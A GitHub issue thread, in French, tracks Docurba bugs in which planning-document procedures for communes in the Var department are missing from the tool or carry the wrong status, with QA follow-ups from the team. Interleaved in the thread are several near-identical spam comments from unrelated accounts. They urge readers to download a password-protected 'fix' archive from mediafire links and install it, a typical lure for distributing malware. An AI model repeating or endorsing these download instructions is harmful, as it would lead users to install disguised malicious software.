### ISSUE TITLE
bug dump : exemples du 83 (ponteves, pourrieres, puget, etc.)

### ISSUE THREAD

**Issue by CeliaVermicelli** [MTES-MCT/Docurba#778]
**To do Célia** : prévenir Josiane et verif les autres issues en lien (Nans les pins Bargemon, Bagnols, Adrets.)

[PONTEVES](https://docurba.beta.gouv.fr/ddt/83/collectivites/83095/commune) :
la prescription de la modification simplifiée n°1 du 21/05/2024 n'apparait pas dans Docurba,
-> QA en prod ✅

[POURRIERES](https://docurba.beta.gouv.fr/frise/119f6715-deca-4ef8-bb11-bd527d388260) : cette commune là est je crois la pire de celles que j'ai pu vérifier ce matin. Actuellement c'est un ancien POS qui apparait en opposable.
Il y a une révision en cours, ce qui est normal, mais la révision actuelle est également notée comme étant en cours toujours à cause d'une annulation partielle dans SuDocUH, qui fait apparaitre l'approbation en invalide dans Docurba au lieu de partiellement annulée et qui fait apparaitre la révision approuvée en cours
-> je comprends que c'est lié aux retours sur Cavalaire dont on avait parlé @HermanceGauth via le [feedback métiers](https://www.notion.so/docurba/Commentaires-sur-les-event-invalide-et-leur-gestion-en-vue-des-cartes-53614848d46e4992b804a814b9357497?pvs=4). Comment gérer les agents qui continuent d'utiliser Sudocuh car ils trouvent ces incohérences - je comprends bien qu'il suffirait p-e d'ajouter l'event d'annulation partielle de Docurba mais as-t-on un use-case qui nous permettrait de l'ajouter de manière à ce que les statuts soit cohérents ? 

[PUGET/ARGENS](https://docurba.beta.gouv.fr/ddt/83/collectivites/83099/commune) : il manque la prescription d'une révision allégée le 30/11/2023 et la prescription d'une modification le 23/10/2023 dans Docurba,
-> QA en prod ✅

[SAINTE-MAXIME](https://docurba.beta.gouv.fr/ddt/83/collectivites/83115/commune) :
la mise à jour du 14/05/2024 n'apparait pas dans Docurba,
-> QA en prod ✅

[SAINT-MAXIMIN :
](https://docurba.beta.gouv.fr/frise/9de4a4c5-c957-44d8-89d3-4725d005834b) la révision allégée n°2 : cette procédure ne comporte pas les mêmes dates, pas le même objet, a des pièces jointes et il est indiquée qu'elle a été modifiée par la DDT, ce qui n'est pas du tout le cas, je n'ai pour le moment procédé à aucune modification ni ajout de pièces sur Docurba sauf pour m'exercer et donc en supprimant mes saisies,
-> c'est possible que ça soit mes saisies, je ne m'en souviens pas. @Octaviedebs est-ce que tu aurais ajouté ces event et la pj par hasard, je me souviens qu'on en avait parlé ensemble car il manquait des PS. -> c'est bien octavie qui avant ajouté ces event pour remplacer le manque de lien entre dépot d'acte et ajout de proc côté CT (pour info, le side/etiquette change sur la frp comme on le change sur retool) 
-> QA 16.09 en dev : la proc de RA nº2 ajoutée sur Sudocuh par la ddt n'apparait pas  ❌ on voit celle ajoutée par la CT/Octavie depuis Docurba.
-> QA 26.09 ❌
-> octobre ✅ en prod - mais doublon sur l'autre proc ajoutée par la CT.

SAINT-TROPEZ :
la modification simplifiée n°4 prescrite le 09/04/2024 n'apparait pas dans Docurba,
-> QA 16.09 en dev : n'apparait pas  ❌
-> QA 26.09 en dev ❌

[SIX-FOURS](https://docurba.beta.gouv.fr/ddt/83/collectivites/83129/commune) :
la mise à jour du 04/04/2024 n'apparait pas dans Docurba,
-> QA 26.09 en prod ✅

[SOLLIES-PONT](https://docurba.beta.gouv.fr/ddt/83/collectivites/83130/commune) :
la modification n°3 prescrite le 27/06/2024 (notée dans SuDocUH le 12/07/2024) n'apparait pas dans Docurba,
-> QA 26.09 en prod ✅

VINS SUR CARAMY:
* la [modification simplifiée n°2](https://docurba.beta.gouv.fr/frise/5e76725c-8e2d-4bc0-b042-583ced3ba30f), approuvée dans SuDocUH (date notée le 24/06/2024), n'apparait toujours que prescrite dans Docurba,
-> QA 16.09 en dev : la FRP ne charge pas [demo](https://jam.dev/c/2d8052ce-ec25-4a01-a292-87c03f0f82aa)
-> QA 26.09 en prod ✅ - en doublon avec une saisi de la CA

* la [mise en compatibilité](https://docurba.beta.gouv.fr/frise/50ee676e-1d72-4c04-82d8-3cdfd026f222) prescrite le 08/04/2024 (et notée le 12/04/2024 dans SuDocUH) n'apparait pas dans Docurba.
-> QA 26.09 en prod ✅

**Comment by youngerwarrior** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by lerayj** [comment]
duplicate #760

**Comment by Octaviedebs** [comment]
Ah mais en fait c'est forcément moi - en fait le rôle change en fonction de comment je suis connectée au moment où on regarde la frp - là j'ai changé en mode ddt via retool - cf cette image 
<img width="1280" alt="Capture d’écran 2024-09-11 à 16 31 44" src="https://github.com/user-attachments/assets/218f93d3-756c-48e8-99eb-d4251b49c375">

Si je l'ai fait c'est parce que augustin massé de la CA avait déposé ces actes via depot d'actes.
Je ne vois pas son point sur la date - c'est bien la date validé par la prefecture

**Comment by CeliaVermicelli** [comment]
re @lerayj, suite au point de ce matin, je vois bien cette issue en "en dev" mais je n'ai rien vu de ce que tu aurai mis à jour à la mano.

J'ai éditer mon premier commentaire en ce sens,

**Comment by lerayj** [comment]
pontev OK
pourriere -> A check avec @UngererFabien , autre sujet
puget OK
saint maxime OK
saint maximin -> KO a double check refresh
saint trop KO -> KO a double check refresh
SIX-FOURS OK
SOLLIES-PONT OK
VINS SUR CARAMY OK

**Comment by CeliaVermicelli** [comment]
Reste à corriger : 

Pourriere 
St tropez

**Comment by HermanceGauth** [comment]
Ca marche , merci. Dans ce cas, peux-tu :
- créer une issue spécifique pour Saint-Tropez
- mettre Pourrière dans le tableau pour les cas spécifiques de statut à gérer à la main
- closed cette issue
